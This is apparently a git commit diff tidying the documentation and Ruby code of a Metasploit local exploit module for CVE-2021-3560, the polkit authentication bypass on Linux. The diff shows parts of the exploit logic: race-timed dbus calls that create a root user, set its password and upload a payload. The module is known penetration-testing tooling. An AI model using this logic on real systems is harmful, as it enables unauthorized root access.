Updated docs
This commit is contained in:
parent
fdbf669da2
commit
9a07039e7e
|
@ -1,6 +1,6 @@
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
|
This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
|
||||||
The vulnerability enables an unprivileged local user to get a root shell on the system.
|
The vulnerability enables an unprivileged local user to get a root shell on the system.
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
|
||||||
**SESSION**
|
**SESSION**
|
||||||
The session to run this module on.
|
The session to run this module on.
|
||||||
|
|
||||||
**WRITABLE_DIR**
|
|
||||||
Directory to write file to (`%TEMP%` by default).
|
|
||||||
|
|
||||||
**USERNAME**
|
**USERNAME**
|
||||||
The name of the user the exploit will add to the system
|
The name of the user the exploit will add to the system
|
||||||
|
|
||||||
**PASSWORD**
|
**PASSWORD**
|
||||||
The password for the user to be created
|
The password for the user to be created
|
||||||
|
|
||||||
|
**WritableDir**
|
||||||
|
Directory to write file to (`%TEMP%` by default).
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
### Tested on Ubuntu 20.04
|
### Tested on Ubuntu 20.04
|
||||||
|
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
'References' => [
|
'References' => [
|
||||||
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
|
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
|
||||||
['CVE', '2021-3560'],
|
['CVE', '2021-3560'],
|
||||||
['EDB', '50011'],
|
['EDB', '50011']
|
||||||
],
|
],
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
register_options([
|
register_options([
|
||||||
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
|
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
|
||||||
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
|
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
|
||||||
OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
||||||
])
|
])
|
||||||
register_advanced_options([
|
register_advanced_options([
|
||||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||||
|
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
if exploit_set_realname(rand_text_alphanumeric(12))
|
if exploit_set_realname(rand_text_alphanumeric(12))
|
||||||
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
|
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
|
||||||
unless exploit_set_realname(old_realname)
|
unless exploit_set_realname(old_realname)
|
||||||
print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
|
print_error('Failed to restore the root user\'s original \'RealName\' property value')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
cmd_args << object_path
|
cmd_args << object_path
|
||||||
cmd_args << interface_member
|
cmd_args << interface_member
|
||||||
args.each do |arg|
|
args.each do |arg|
|
||||||
if arg.is_a? Integer
|
if arg.is_a?(Integer)
|
||||||
cmd_args << "int32:#{arg}"
|
cmd_args << "int32:#{arg}"
|
||||||
elsif arg.is_a? String
|
elsif arg.is_a?(String)
|
||||||
cmd_args << "string:'#{arg}'"
|
cmd_args << "string:'#{arg}'"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload(path, data)
|
def upload(path, data)
|
||||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
print_status("Writing '#{path}' (#{data.size} bytes) ...")
|
||||||
rm_f path
|
rm_f(path)
|
||||||
write_file path, data
|
write_file(path, data)
|
||||||
register_file_for_cleanup path
|
register_file_for_cleanup(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload_and_chmodx(path, data)
|
def upload_and_chmodx(path, data)
|
||||||
upload path, data
|
upload(path, data)
|
||||||
chmod path
|
chmod(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload_payload
|
def upload_payload
|
||||||
|
@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
if exploit_set_username(loop_sequence)
|
if exploit_set_username(loop_sequence)
|
||||||
uid = cmd_exec("id -u #{datastore['USERNAME']}")
|
uid = cmd_exec("id -u #{datastore['USERNAME']}")
|
||||||
print_good("User #{datastore['USERNAME']} created with UID #{uid}")
|
print_good("User #{datastore['USERNAME']} created with UID #{uid}")
|
||||||
print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
||||||
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
|
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
|
||||||
print_good('Obtained code execution has root!')
|
print_good('Obtained code execution has root!')
|
||||||
fname = upload_payload
|
fname = upload_payload
|
||||||
|
|
Loading…
Reference in New Issue